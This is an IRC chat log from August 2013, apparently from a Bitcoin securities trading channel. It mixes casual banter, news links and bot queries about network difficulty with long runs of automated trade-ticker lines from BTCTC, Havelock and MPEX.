http://www.reuters.com/article/2013/08/17/us-usa-cockfighting-princess-idUSBRE97G00D20130817 Aug 17 03:50:20 Romanian princess among 18 charged in Oregon over cockfighting Aug 17 03:52:10 So, fill me in on what I missed regarding CFIG. Someone mention eVoorhees whaling on it. Any evidence of this? Aug 17 03:58:26 dub they're just pretenders. no princess. Aug 17 03:58:35 buncha weird circus ppl. Aug 17 04:01:22 is it one of these pretenders: http://en.wikipedia.org/wiki/Category:Pretenders_to_the_Romanian_throne Aug 17 04:01:51 the last set. Aug 17 04:03:14 [BTCTC] [ACTIVEMINING] 264 @ 0.005297 = 1.3984 BTC [-] Aug 17 04:03:15 [BTCTC] [ACTIVEMINING] 36 @ 0.005298 = 0.1907 BTC [+] Aug 17 04:03:32 [BTCTC] [LABCOIN] 30 @ 0.001661 = 0.0498 BTC [+] Aug 17 04:03:33 [BTCTC] [LABCOIN] 30 @ 0.001662 = 0.0499 BTC [+] Aug 17 04:03:58 [BTCTC] [TAT.ASICMINER] 2 @ 0.03877 = 0.0775 BTC [-] Aug 17 04:04:40 [BTCTC] [LABCOIN] 8 @ 0.001662 = 0.0133 BTC [+] Aug 17 04:05:54 [BTCTC] [LABCOIN] 9 @ 0.00164 = 0.0148 BTC [-] Aug 17 04:07:40 [BTCTC] [ACTIVEMINING] 2 @ 0.005218 = 0.0104 BTC [-] Aug 17 04:17:41 [BTCTC] [DMS.PURCHASE] 100 @ 0.02078 = 2.078 BTC [-] Aug 17 04:18:21 anyone want to do an ipo to hire 100 lawyers to take on usa? Aug 17 04:19:53 http://www.welt.de/finanzen/geldanlage/article119086297/Deutschland-erkennt-Bitcoin-als-privates-Geld-an.html Aug 17 04:20:01 teh germanz mebbe Aug 17 04:21:34 lol... Aug 17 04:21:39 hahah Aug 17 04:21:46 gonna take more than that Aug 17 04:22:25 i think with lawyers and social media trolls it could be a intresting war Aug 17 04:22:54 yeah, internet virgins + professional whiners vs modern armor and drones. Aug 17 04:22:56 [BTCTC] [DMS.MINING] 74 @ 0.003289 = 0.2434 BTC [-] Aug 17 04:22:58 [BTCTC] [DMS.MINING] 2 @ 0.003289 = 0.0066 BTC [-] Aug 17 04:23:00 popcorn.gif pls Aug 17 04:23:50 [BTCTC] [TAT.ASICMINER] 20 @ 0.03873 = 0.7746 BTC [-] Aug 17 04:26:59 What if I had a 100 Terawatt portable laser minigun and gave it to the virgins and whiners? WHAT THEN? Aug 17 04:27:37 they'd be blind in short order ? Aug 17 04:28:08 you should read the art of war sometime Aug 17 04:28:21 No, it would add a much needed science fiction element to make the story more interesting. Aug 17 04:28:25 modern armor and drones dont mean much Aug 17 04:29:02 They would go blind in short order, they'd probably pop holes in their heads with 100 Terawatt Aug 17 04:29:10 wouldn't* Aug 17 04:32:29 anyway, my best friends are china, russia and south america Aug 17 04:32:57 have you ever been to those places? Aug 17 04:33:04 [BTCTC] [KENILWORTH] 550 @ 0.001797 = 0.9884 BTC [+] Aug 17 04:33:13 [BTCTC] [ACTIVEMINING] 2 @ 0.005296 = 0.0106 BTC [+] Aug 17 04:33:15 [BTCTC] [ACTIVEMINING] 11 @ 0.005297 = 0.0583 BTC [+] Aug 17 04:33:29 yeah i'm in all 3 atm Aug 17 04:33:36 [BTCTC] [KENILWORTH] 450 @ 0.001798 = 0.8091 BTC [+] Aug 17 04:34:12 pff Aug 17 04:34:20 true ballers live in dublandia Aug 17 04:34:43 not SatoshiIsland? Aug 17 04:35:01 [BTCTC] [ACTIVEMINING] 52 @ 0.005297 = 0.2754 BTC [+] Aug 17 04:36:33 [BTCTC] [TAT.ASICMINER] 3 @ 0.03816 = 0.1145 BTC [-] Aug 17 04:37:23 [BTCTC] [ACTIVEMINING] 145 @ 0.005298 = 0.7682 BTC [+] Aug 17 04:39:22 Replace Sat with an Y Aug 17 04:40:19 http://static.giantbomb.com/uploads/original/9/93770/2364715-snes_yoshis_island.jpg Aug 17 04:40:36 good game Aug 17 04:40:44 Yes indeed Aug 17 04:40:51 suppose to be on wii u soon no? Aug 17 04:41:41 [BTCTC] [ACTIVEMINING] 28 @ 0.005216 = 0.146 BTC [-] Aug 17 04:42:07 idk, I get old game on emulators Aug 17 04:42:35 I don't keep up much with new consoles and what gets on them until a decade after they're out eh Aug 17 04:42:54 [BTCTC] [LABCOIN] 30 @ 0.001638 = 0.0491 BTC [-] Aug 17 04:42:56 [BTCTC] [LABCOIN] 60 @ 0.001637 = 0.0982 BTC [-] Aug 17 04:44:05 [HAVELOCK] [AM100] 5 @ 0.0379 = 0.1895 BTC [+] Aug 17 04:44:21 [HAVELOCK] [XBOND] 1 @ 0.0010658 BTC [+] Aug 17 04:44:51 So, what do you guys think of the Bitcoin "Embassy" Aug 17 04:45:09 link? Aug 17 04:45:28 http://bitcoinembassy.ca/ Aug 17 04:45:44 Something some people are trying to start in Montreal Aug 17 04:45:47 [BTCTC] [ACTIVEMINING] 6 @ 0.005298 = 0.0318 BTC [+] Aug 17 04:46:21 isn't this bitcoin foundations job? Aug 17 04:47:11 What is Bitcoin Foundation doing anyway? It has no presense in Canada. Aug 17 04:47:16 [HAVELOCK] [AM100] 10 @ 0.03731001 = 0.3731 BTC [-] Aug 17 04:47:20 It's too tiny tho... Aug 17 04:47:26 This project Aug 17 04:47:29 [HAVELOCK] [AM100] 5 @ 0.03730003 = 0.1865 BTC [-] Aug 17 04:47:51 prety good idea, wish had something here like that to talk to and collaborate etc Aug 17 04:48:19 [HAVELOCK] [AM100] 6 @ 0.0373 = 0.2238 BTC [-] Aug 17 04:49:11 https://maps.google.ca/maps?hl=en&ll=45.513189,-73.570933&spn=0.01051,0.028389&t=m&z=16&layer=c&cbll=45.513146,-73.570817&panoid=PACwmoe0FBw6varpyN0HtA&cbp=12,43.84,,0,-0.09 Aug 17 04:49:14 Google Maps Aug 17 04:49:33 I might go. There's something good to the right. The yellow building. Aug 17 04:50:56 But it's too small and I don't like the name. Aug 17 04:52:32 [HAVELOCK] [XBOND] 430 @ 0.0010658 = 0.4583 BTC [+] Aug 17 04:52:43 Not ambitious enough Aug 17 04:53:28 [HAVELOCK] [XBOND] 10 @ 0.00106971 = 0.0107 BTC [+] Aug 17 04:53:40 [HAVELOCK] [XBOND] 103 @ 0.00107 = 0.1102 BTC [+] Aug 17 04:54:08 [HAVELOCK] [XBOND] 180 @ 0.00107 = 0.1926 BTC [+] Aug 17 04:54:27 [HAVELOCK] [XBOND] 8 @ 0.00107 = 0.0086 BTC [+] Aug 17 04:56:44 [BTCTC] [ACTIVEMINING] 1 @ 0.005297 BTC [-] Aug 17 04:57:11 [BTCTC] [DMS.PURCHASE] 11 @ 0.02078 = 0.2286 BTC [-] Aug 17 04:59:44 [BTCTC] [DMS.PURCHASE] 18 @ 0.02078 = 0.374 BTC [-] Aug 17 05:12:57 [MPEX] [S.MPOE] 12100 @ 0.00083734 = 10.1318 BTC [-] Aug 17 05:12:59 [MPEX] [S.MPOE] 5350 @ 0.00083743 = 4.4803 BTC [+] Aug 17 05:20:00 [BTCTC] [NASTY-PT] 2 @ 0.00409 = 0.0082 BTC [-] Aug 17 05:30:49 [HAVELOCK] [AM100] 1 @ 0.03789985 BTC [+] Aug 17 05:32:23 [HAVELOCK] [XBOND] 32 @ 0.00107 = 0.0342 BTC [+] **** BEGIN LOGGING AT Sat Aug 17 13:38:46 2013 Aug 17 13:39:18 ThickAsThieves that's pretty cool Aug 17 13:39:47 sorry my timing on the link might have been off Aug 17 13:40:01 but yeah i was happy to hear them say MPEX Aug 17 13:40:22 !seen burnside Aug 17 13:40:29 RT is all bitcoin-hip Aug 17 13:40:50 Anyone seen burnside? Aug 17 13:40:55 i hope they said it witgh smallcase x Aug 17 13:41:58 haha Aug 17 13:44:42 lol Aug 17 13:46:50 Anyone seen burnside? <<< No Aug 17 13:47:05 pm him on the forums Aug 17 13:52:22 ;;nethash Aug 17 13:52:22 448507.246614 Aug 17 13:52:25 wow Aug 17 13:52:30 ;;estimate Aug 17 13:52:31 Next difficulty estimate | None based on data since last change | 62654782.4969 based on data for last three days Aug 17 13:53:10 .d Aug 17 13:53:11 50810339.04828 | Next Diff in 1386 blocks | Estimated Change: 18.4886% in 7d 20h 10m 15s Aug 17 13:58:15 shiiieeeet Aug 17 14:01:52 [BTCTC] [BITVPS] 2 @ 0.002987 = 0.006 BTC [+] Aug 17 14:03:18 [MPEX] [S.MPOE] 8500 @ 0.00081985 = 6.9687 BTC [-] Aug 17 14:07:07 [BTCTC] [ASICMINER-PT] 1 @ 3.82 BTC [-] Aug 17 14:08:20 Ta TAT. Aug 17 14:09:01 can anyone access bter.com? Aug 17 14:09:15 ;;isitdown bter.com Aug 17 14:09:17 bter.com is up Aug 17 14:09:29 not for me Aug 17 14:09:45 clean your tubes Aug 17 14:10:55 [BTCTC] [ASICMINER-PT] 1 @ 3.82 BTC [-] Aug 17 14:12:00 dns error still Aug 17 14:12:02 -.- Aug 17 14:12:41 [BTCTC] [DMS.PURCHASE] 43 @ 0.02078 = 0.8935 BTC [+] Aug 17 14:12:44 if its up for you, can you tell me what the current ask price for MYMINER is, and the 7d average? Aug 17 14:13:47 [BTCTC] [ASICMINER-PT] 2 @ 3.82 = 7.64 BTC [-] Aug 17 14:14:36 wtf is this shit Aug 17 14:17:23 [BTCTC] [BTC-GROWTH] 40 @ 0.1006 = 4.024 BTC [-] Aug 17 14:22:13 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1989 BTC [+] Aug 17 14:23:55 [BTCTC] [LABCOIN] 1 @ 0.001622 BTC [-] Aug 17 14:27:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.03859 BTC [-] Aug 17 14:31:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.0385 BTC [-] Aug 17 14:33:39 [BTCTC] [ASICMINER-PT] 1 @ 3.894 BTC [+] Aug 17 14:33:41 [BTCTC] [ASICMINER-PT] 1 @ 3.895 BTC [+] Aug 17 14:34:24 [BTCTC] [BTC-GROWTH] 20 @ 0.1045 = 2.09 BTC [+] Aug 17 14:35:40 [BTCTC] [LABCOIN] 85 @ 0.001654 = 0.1406 BTC [+] Aug 17 14:35:41 [BTCTC] [LABCOIN] 1 @ 0.001658 BTC [+] Aug 17 14:35:42 [BTCTC] [LABCOIN] 1 @ 0.001661 BTC [+] Aug 17 14:35:43 [BTCTC] [LABCOIN] 20 @ 0.001662 = 0.0332 BTC [+] Aug 17 14:35:44 [BTCTC] [LABCOIN] 260 @ 0.001683 = 0.4376 BTC [+] Aug 17 14:35:45 [BTCTC] [LABCOIN] 250 @ 0.001684 = 0.421 BTC [+] Aug 17 14:35:46 [BTCTC] [LABCOIN] 533 @ 0.001685 = 0.8981 BTC [+] Aug 17 14:36:52 [BTCTC] [LABCOIN] 1 @ 0.001682 BTC [-] Aug 17 14:39:15 [BTCTC] [BTC-GROWTH] 20 @ 0.1045 = 2.09 BTC [+] Aug 17 14:39:17 [BTCTC] [BTC-GROWTH] 5 @ 0.1045 = 0.5225 BTC [+] Aug 17 14:39:18 [BTCTC] [BTC-GROWTH] 3 @ 0.1046 = 0.3138 BTC [+] Aug 17 14:39:19 [BTCTC] [BTC-GROWTH] 4 @ 0.1047 = 0.4188 BTC [+] Aug 17 14:39:20 [BTCTC] [BTC-GROWTH] 10 @ 0.1047 = 1.047 BTC [+] Aug 17 14:39:21 [BTCTC] [BTC-GROWTH] 2 @ 0.1048 = 0.2096 BTC [+] Aug 17 14:39:21 [BTCTC] [BTC-GROWTH] 39 @ 0.1048 = 4.0872 BTC [+] Aug 17 14:39:23 [BTCTC] [BTC-GROWTH] 27 @ 0.1048 = 2.8296 BTC [+] Aug 17 14:41:22 [BTCTC] [ACTIVEMINING] 6 @ 0.005083 = 0.0305 BTC [-] Aug 17 14:41:31 [MPEX] [S.MPOE] 5400 @ 0.00082568 = 4.4587 BTC [+] Aug 17 14:43:58 http://www.theverge.com/2013/8/15/4623016/buying-a-laptop-everything-you-need-to-know Aug 17 14:44:01 Buying a laptop: everything you need to know | The Verge Aug 17 14:44:12 they list one of the types of users as "I want to mine Bitcoins" Aug 17 14:44:28 and propose a $13K laptop Aug 17 14:44:37 [BTCTC] [S.MPOE-PT] 282 @ 0.0008602 = 0.2426 BTC [-] Aug 17 14:44:39 [BTCTC] [S.MPOE-PT] 100 @ 0.0008601 = 0.086 BTC [-] Aug 17 14:44:40 [BTCTC] [S.MPOE-PT] 140 @ 0.00086 = 0.1204 BTC [-] Aug 17 14:44:40 and here i thought The Verge were smart Aug 17 14:48:21 [BTCTC] [DMS.PURCHASE] 200 @ 0.02078 = 4.156 BTC [+] Aug 17 14:52:03 ello Aug 17 14:53:15 [BTCTC] [LABCOIN] 30 @ 0.00167 = 0.0501 BTC [-] Aug 17 14:53:16 [BTCTC] [LABCOIN] 3 @ 0.001671 = 0.005 BTC [+] Aug 17 14:57:39 http://www.cnn.com/2013/08/17/us/maryland-armored-whiteboards/index.html?hpt=hp_t2 Aug 17 14:57:41 lol Aug 17 14:57:42 Maryland university buying bulletproof whiteboards to protect profs - CNN.com Aug 17 15:00:09 [HAVELOCK] [XBOND] [PAID] 1.00978800 BTC to 2`019`576 shares, 50 satoshi per share Aug 17 15:00:26 probably get a better ROI on that laptop then some recent IPO's ;P Aug 17 15:04:36 [BTCTC] [DMS.SELLING] 5 @ 0.01769 = 0.0885 BTC [+] Aug 17 15:04:37 [BTCTC] [DMS.SELLING] 1 @ 0.01774 BTC [+] Aug 17 15:05:10 [HAVELOCK] [XBOND] 7 @ 0.00109898 = 0.0077 BTC [+] Aug 17 15:09:10 [MPEX] [S.MPOE] 9133 @ 0.00082758 = 7.5583 BTC [+] Aug 17 15:09:11 [MPEX] [S.MPOE] 1700 @ 0.00082823 = 1.408 BTC [+] Aug 17 15:09:48 [MPEX] [S.MPOE] 2700 @ 0.00083026 = 2.2417 BTC [+] Aug 17 15:14:08 ThickAsThieves laptop mining, that's hot right now. Aug 17 15:14:29 lol Aug 17 15:15:46 [BTCTC] [BASIC-MINING] 1 @ 0.2899 BTC [+] Aug 17 15:16:19 [BTCTC] [LABCOIN] 1 @ 0.001665 BTC [-] Aug 17 15:16:21 [BTCTC] [LABCOIN] 20 @ 0.001666 = 0.0333 BTC [+] Aug 17 15:16:22 [BTCTC] [LABCOIN] 185 @ 0.001683 = 0.3114 BTC [+] Aug 17 15:16:23 [BTCTC] [LABCOIN] 500 @ 0.001684 = 0.842 BTC [+] Aug 17 15:16:24 [BTCTC] [LABCOIN] 1294 @ 0.001685 = 2.1804 BTC [+] Aug 17 15:17:22 [BTCTC] [ACTIVEMINING] 6 @ 0.005168 = 0.031 BTC [+] Aug 17 15:17:23 [BTCTC] [ACTIVEMINING] 1 @ 0.005169 BTC [+] Aug 17 15:17:24 [BTCTC] [ACTIVEMINING] 18 @ 0.005284 = 0.0951 BTC [+] Aug 17 15:17:26 [BTCTC] [ACTIVEMINING] 90 @ 0.005285 = 0.4757 BTC [+] Aug 17 15:17:27 [BTCTC] [ACTIVEMINING] 48 @ 0.005289 = 0.2539 BTC [+] Aug 17 15:17:28 [BTCTC] [ACTIVEMINING] 244 @ 0.00529 = 1.2908 BTC [+] Aug 17 15:17:28 [BTCTC] [ACTIVEMINING] 393 @ 0.005295 = 2.0809 BTC [+] Aug 17 15:20:55 [BTCTC] [DMS.MINING] 50 @ 0.003483 = 0.1742 BTC [-] Aug 17 15:22:34 [BTCTC] [NASTY-PT] 12 @ 0.004 = 0.048 BTC [-] Aug 17 15:22:46 [BTCTC] [BTC-GROWTH] 3 @ 0.1047 = 0.3141 BTC [-] Aug 17 15:22:47 [BTCTC] [BTC-GROWTH] 5 @ 0.1047 = 0.5235 BTC [-] Aug 17 15:22:49 [BTCTC] [BTC-GROWTH] 72 @ 0.1048 = 7.5456 BTC [+] Aug 17 15:22:50 [BTCTC] [BTC-GROWTH] 50 @ 0.1049 = 5.245 BTC [+] Aug 17 15:22:51 [BTCTC] [BTC-GROWTH] 5 @ 0.105 = 0.525 BTC [+] Aug 17 15:22:52 [BTCTC] [BTC-GROWTH] 30 @ 0.105 = 3.15 BTC [+] Aug 17 15:23:43 [BTCTC] [BTC-GROWTH] 23 @ 0.1054 = 2.4242 BTC [+] Aug 17 15:23:44 [BTCTC] [BTC-GROWTH] 25 @ 0.1055 = 2.6375 BTC [+] Aug 17 15:26:13 [BTCTC] [BTC-GROWTH] 1 @ 0.1052 BTC [-] Aug 17 15:26:15 [BTCTC] [BTC-GROWTH] 9 @ 0.1053 = 0.9477 BTC [+] Aug 17 15:27:43 [MPEX] [S.MPOE] 6900 @ 0.00083026 = 5.7288 BTC [+] Aug 17 15:29:45 [BTCTC] [BASIC-MINING] 1 @ 0.2801 BTC [-] Aug 17 15:29:46 [BTCTC] [BASIC-MINING] 2 @ 0.28 = 0.56 BTC [-] Aug 17 15:29:48 [BTCTC] [BASIC-MINING] 9 @ 0.28 = 2.52 BTC [-] Aug 17 15:29:59 [BTCTC] [DMS.MINING] 20 @ 0.003123 = 0.0625 BTC [-] Aug 17 15:30:01 [BTCTC] [DMS.MINING] 2 @ 0.003122 = 0.0062 BTC [-] Aug 17 15:30:02 [BTCTC] [DMS.MINING] 17 @ 0.003122 = 0.0531 BTC [-] Aug 17 15:30:03 [BTCTC] [DMS.MINING] 4 @ 0.00312 = 0.0125 BTC [-] Aug 17 15:30:04 [BTCTC] [DMS.MINING] 17 @ 0.003103 = 0.0528 BTC [-] Aug 17 15:30:06 [BTCTC] [DMS.MINING] 3 @ 0.003102 = 0.0093 BTC [-] Aug 17 15:30:07 [BTCTC] [DMS.MINING] 15 @ 0.003101 = 0.0465 BTC [-] Aug 17 15:30:07 [BTCTC] [DMS.MINING] 100 @ 0.0031 = 0.31 BTC [-] Aug 17 15:31:48 [BTCTC] [TAT.ASICMINER] 7 @ 0.0384 = 0.2688 BTC [-] Aug 17 15:31:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.0381 BTC [-] Aug 17 15:32:17 ;;later tell mod6 you're unstuck now :) Aug 17 15:32:17 The operation succeeded. Aug 17 15:33:17 http://www.youtube.com/watch?v=KrhfClIcfYM Aug 17 15:33:18 Angry ram attacks motorcyclist - Original - As seen on CNN, CBS, DAILY MAIL, NZ TV3 NEWS - YouTube Aug 17 15:33:20 pwnd Aug 17 15:35:58 [BTCTC] [BTC-GROWTH] 1 @ 0.1053 BTC [+] Aug 17 15:36:17 [BTCTC] [DMS.PURCHASE] 153 @ 0.02078 = 3.1793 BTC [+] Aug 17 15:42:36 [BTCTC] [BTC-GROWTH] 1 @ 0.106 BTC [+] Aug 17 15:42:37 [BTCTC] [BTC-GROWTH] 1 @ 0.106 BTC [+] Aug 17 15:42:38 [BTCTC] [BTC-GROWTH] 1 @ 0.106 BTC [+] Aug 17 15:42:39 [BTCTC] [BTC-GROWTH] 5 @ 0.1072 = 0.536 BTC [+] Aug 17 15:42:41 [BTCTC] [BTC-GROWTH] 7 @ 0.1073 = 0.7511 BTC [+] Aug 17 15:42:59 [BTCTC] [LABCOIN] 10 @ 0.00166 = 0.0166 BTC [-] Aug 17 15:43:00 [BTCTC] [LABCOIN] 50 @ 0.001654 = 0.0827 BTC [-] Aug 17 15:43:02 [BTCTC] [LABCOIN] 68 @ 0.001628 = 0.1107 BTC [-] Aug 17 15:43:03 [BTCTC] [LABCOIN] 550 @ 0.001627 = 0.8949 BTC [-] Aug 17 15:43:03 [BTCTC] [LABCOIN] 40 @ 0.001604 = 0.0642 BTC [-] Aug 17 15:43:04 [BTCTC] [LABCOIN] 60 @ 0.001604 = 0.0962 BTC [-] Aug 17 15:43:05 [BTCTC] [LABCOIN] 218 @ 0.001603 = 0.3495 BTC [-] Aug 17 15:43:07 [BTCTC] [LABCOIN] 6 @ 0.001603 = 0.0096 BTC [-] Aug 17 15:43:08 [BTCTC] [LABCOIN] 249 @ 0.001602 = 0.3989 BTC [-] Aug 17 15:59:51 [BTCTC] [LABCOIN] 30 @ 0.001649 = 0.0495 BTC [+] Aug 17 15:59:52 [BTCTC] [LABCOIN] 20 @ 0.001648 = 0.033 BTC [-] Aug 17 16:03:13 [HAVELOCK] [CFIG] 5 @ 0.15 = 0.75 BTC Aug 17 16:19:18 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.001197 = 0.0072 BTC [-] Aug 17 16:20:29 [BTCTC] [DMS.MINING] 17 @ 0.003199 = 0.0544 BTC [+] Aug 17 16:20:54 [BTCTC] [DMS.MINING] 50 @ 0.0032 = 0.16 BTC [+] Aug 17 16:21:21 [BTCTC] [DMS.MINING] 50 @ 0.0033 = 0.165 BTC [+] Aug 17 16:21:45 [BTCTC] [DMS.MINING] 50 @ 0.003449 = 0.1725 BTC [+] Aug 17 16:22:16 [BTCTC] [DMS.MINING] 320 @ 0.00345 = 1.104 BTC [+] Aug 17 16:22:40 [BTCTC] [DMS.MINING] 90 @ 0.003483 = 0.3135 BTC [+] Aug 17 16:23:06 [BTCTC] [DMS.MINING] 400 @ 0.003484 = 1.3936 BTC [+] Aug 17 16:23:30 [BTCTC] [DMS.MINING] 500 @ 0.003485 = 1.7425 BTC [+] Aug 17 16:25:01 [BTCTC] [DMS.MINING] 50 @ 0.0033 = 0.165 BTC [-] Aug 17 16:25:02 [BTCTC] [DMS.MINING] 50 @ 0.0034 = 0.17 BTC [+] Aug 17 16:25:03 [BTCTC] [DMS.MINING] 10 @ 0.003485 = 0.0349 BTC [+] Aug 17 16:25:04 [BTCTC] [DMS.MINING] 302 @ 0.003486 = 1.0528 BTC [+] Aug 17 16:25:40 [BTCTC] [DMS.MINING] 4 @ 0.003485 = 0.0139 BTC [-] Aug 17 16:36:55 [BTCTC] [BTC-GROWTH] 39 @ 0.1069 = 4.1691 BTC [-] Aug 17 16:36:56 [BTCTC] [BTC-GROWTH] 10 @ 0.107 = 1.07 BTC [+] Aug 17 16:37:48 [BTCTC] [BTC-GROWTH] 39 @ 0.1072 = 4.1808 BTC [+] Aug 17 16:37:49 [BTCTC] [BTC-GROWTH] 2 @ 0.1073 = 0.2146 BTC [+] Aug 17 16:40:15 [BTCTC] [COGNITIVE] 5 @ 0.398 = 1.99 BTC [+] Aug 17 16:47:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.03808 BTC [-] Aug 17 16:47:25 [BTCTC] [TAT.ASICMINER] 50 @ 0.03808 = 1.904 BTC [-] Aug 17 16:49:16 [BTCTC] [COGNITIVE] 3 @ 0.3983 = 1.1949 BTC [+] Aug 17 16:49:36 [BTCTC] [BITVPS] 32 @ 0.002551 = 0.0816 BTC [-] Aug 17 16:53:03 [BTCTC] [LABCOIN] 27 @ 0.00163 = 0.044 BTC [-] Aug 17 16:53:27 [BTCTC] [LABCOIN] 85 @ 0.001612 = 0.137 BTC [-] Aug 17 16:53:28 [BTCTC] [LABCOIN] 30 @ 0.001612 = 0.0484 BTC [-] Aug 17 16:53:30 [BTCTC] [LABCOIN] 485 @ 0.001611 = 0.7813 BTC [-] Aug 17 16:53:55 [BTCTC] [ACTIVEMINING] 68 @ 0.005277 = 0.3588 BTC [-] Aug 17 16:54:29 [BTCTC] [ACTIVEMINING] 10 @ 0.005279 = 0.0528 BTC [+] Aug 17 16:54:44 [BTCTC] [ACTIVEMINING] 58 @ 0.005279 = 0.3062 BTC [+] Aug 17 16:54:56 [BTCTC] [DMS.SELLING] 10 @ 0.01774 = 0.1774 BTC [+] Aug 17 16:55:11 [BTCTC] [ACTIVEMINING] 10 @ 0.00528 = 0.0528 BTC [+] Aug 17 16:55:32 [BTCTC] [ACTIVEMINING] 45 @ 0.00528 = 0.2376 BTC [+] Aug 17 16:55:48 [BTCTC] [DMS.MINING] 16 @ 0.003399 = 0.0544 BTC [-] Aug 17 16:55:49 [BTCTC] [DMS.MINING] 1 @ 0.003399 BTC [-] Aug 17 16:56:43 [BTCTC] [DMS.MINING] 8 @ 0.0034 = 0.0272 BTC [+] Aug 17 16:58:18 [BTCTC] [ASICMINER-PT] 2 @ 3.892 = 7.784 BTC [-] Aug 17 16:58:57 [BTCTC] [ASICMINER-PT] 1 @ 3.893 BTC [+] Aug 17 16:58:59 [BTCTC] [ASICMINER-PT] 1 @ 3.893 BTC [+] Aug 17 17:00:26 [BTCTC] [NASTY-PT] 2 @ 0.00399 = 0.008 BTC [-] Aug 17 17:05:03 [BTCTC] [ASICMINER-PT] 3 @ 3.892 = 11.676 BTC [-] Aug 17 17:13:31 [BTCTC] [ASICMINER-PT] 1 @ 3.855 BTC [-] Aug 17 17:14:45 [BTCTC] [LABCOIN] 30 @ 0.001613 = 0.0484 BTC [+] Aug 17 17:14:46 [BTCTC] [LABCOIN] 522 @ 0.001612 = 0.8415 BTC [-] Aug 17 17:14:47 [BTCTC] [LABCOIN] 1015 @ 0.001611 = 1.6352 BTC [-] Aug 17 17:14:48 [BTCTC] [LABCOIN] 533 @ 0.001606 = 0.856 BTC [-] Aug 17 17:14:53 [BTCTC] [TAT.ASICMINER] 12 @ 0.03807 = 0.4568 BTC [-] Aug 17 17:14:54 [BTCTC] [TAT.ASICMINER] 18 @ 0.03807 = 0.6853 BTC [-] Aug 17 17:15:30 [BTCTC] [TAT.ASICMINER] 20 @ 0.03806 = 0.7612 BTC [-] Aug 17 17:16:23 [BTCTC] [ACTIVEMINING] 30 @ 0.005138 = 0.1541 BTC [-] Aug 17 17:16:24 [BTCTC] [ACTIVEMINING] 68 @ 0.005137 = 0.3493 BTC [-] Aug 17 17:16:26 [BTCTC] [ACTIVEMINING] 1 @ 0.005123 BTC [-] Aug 17 17:16:27 [BTCTC] [ACTIVEMINING] 10 @ 0.00512 = 0.0512 BTC [-] Aug 17 17:16:28 [BTCTC] [ACTIVEMINING] 240 @ 0.0051 = 1.224 BTC [-] Aug 17 17:16:28 [BTCTC] [ACTIVEMINING] 1200 @ 0.005099 = 6.1188 BTC [-] Aug 17 17:20:12 [BTCTC] [TAT.ASICMINER] 9 @ 0.03859 = 0.3473 BTC [+] Aug 17 17:20:13 [BTCTC] [TAT.ASICMINER] 50 @ 0.03859 = 1.9295 BTC [+] Aug 17 17:21:14 [BTCTC] [TAT.ASICMINER] 59 @ 0.03806 = 2.2455 BTC [-] Aug 17 17:26:25 where's the volume, the rampant speculation and the IPO chaos? Aug 17 17:28:45 [BTCTC] [DMS.PURCHASE] 1000 @ 0.02078 = 20.78 BTC [+] Aug 17 17:34:33 [BTCTC] [LABCOIN] 3 @ 0.001649 = 0.0049 BTC [+] Aug 17 17:34:34 [BTCTC] [LABCOIN] 2 @ 0.001658 = 0.0033 BTC [+] Aug 17 17:34:35 [BTCTC] [LABCOIN] 20 @ 0.001659 = 0.0332 BTC [+] Aug 17 17:34:36 [BTCTC] [LABCOIN] 10 @ 0.001667 = 0.0167 BTC [+] Aug 17 17:34:38 [BTCTC] [LABCOIN] 80 @ 0.001668 = 0.1334 BTC [+] Aug 17 17:34:39 [BTCTC] [LABCOIN] 84 @ 0.001683 = 0.1414 BTC [+] Aug 17 17:34:50 [BTCTC] [ASICMINER-PT] 1 @ 3.892 BTC [+] Aug 17 17:34:51 [BTCTC] [ASICMINER-PT] 6 @ 3.893 = 23.358 BTC [+] Aug 17 17:35:22 [BTCTC] [LABCOIN] 30 @ 0.001682 = 0.0505 BTC [-] Aug 17 17:42:45 [BTCTC] [LABCOIN] 30 @ 0.001652 = 0.0496 BTC [-] Aug 17 17:42:47 [BTCTC] [LABCOIN] 75 @ 0.001653 = 0.124 BTC [+] Aug 17 17:42:48 [BTCTC] [LABCOIN] 4 @ 0.001655 = 0.0066 BTC [+] Aug 17 17:42:48 [BTCTC] [LABCOIN] 1 @ 0.001658 BTC [+] Aug 17 17:42:49 [BTCTC] [LABCOIN] 16 @ 0.001659 = 0.0265 BTC [+] Aug 17 17:42:50 [BTCTC] [LABCOIN] 84 @ 0.001683 = 0.1414 BTC [+] Aug 17 17:42:55 [BTCTC] [LABCOIN] 8 @ 0.001683 = 0.0135 BTC [+] Aug 17 17:43:16 [BTCTC] [LABCOIN] 22 @ 0.001656 = 0.0364 BTC [-] Aug 17 17:43:34 [BTCTC] [LABCOIN] 30 @ 0.001655 = 0.0497 BTC [-] Aug 17 17:48:49 [BTCTC] [BTC-BOND] 2 @ 0.009995 = 0.02 BTC [+] Aug 17 17:51:14 [BTCTC] [TAT.ASICMINER] 2 @ 0.0385 = 0.077 BTC [+] Aug 17 17:53:21 [BTCTC] [ACTIVEMINING] 2 @ 0.005242 = 0.0105 BTC [+] Aug 17 17:54:00 [BTCTC] [TAT.ASICMINER] 8 @ 0.0385 = 0.308 BTC [+] Aug 17 18:05:14 http://metro.co.uk/2013/08/15/children-get-police-warning-letters-for-intimidating-and-antisocial-behaviour-because-they-played-outside-3925725/ Aug 17 18:07:06 [HAVELOCK] [XBOND] 50 @ 0.0011 = 0.055 BTC [+] Aug 17 18:12:14 [HAVELOCK] [XBOND] 5 @ 0.0011 = 0.0055 BTC [+] Aug 17 18:12:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.0385 BTC [+] Aug 17 18:14:13 [BTCTC] [ACTIVEMINING] 6 @ 0.00516 = 0.031 BTC [-] Aug 17 18:14:15 [BTCTC] [ACTIVEMINING] 144 @ 0.00513 = 0.7387 BTC [-] Aug 17 18:15:14 [BTCTC] [BASIC-MINING] 2 @ 0.285 = 0.57 BTC [+] Aug 17 18:23:14 [HAVELOCK] [XBOND] 7 @ 0.0011 = 0.0077 BTC [+] Aug 17 18:32:46 [HAVELOCK] [LABCO] 1 @ 0.00177 BTC [+] Aug 17 18:33:27 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.001196 = 0.0036 BTC [-] Aug 17 18:34:53 [BTCTC] [DMS.MINING] 300 @ 0.003389 = 1.0167 BTC [-] Aug 17 18:35:41 [HAVELOCK] [XBOND] 1 @ 0.00109999 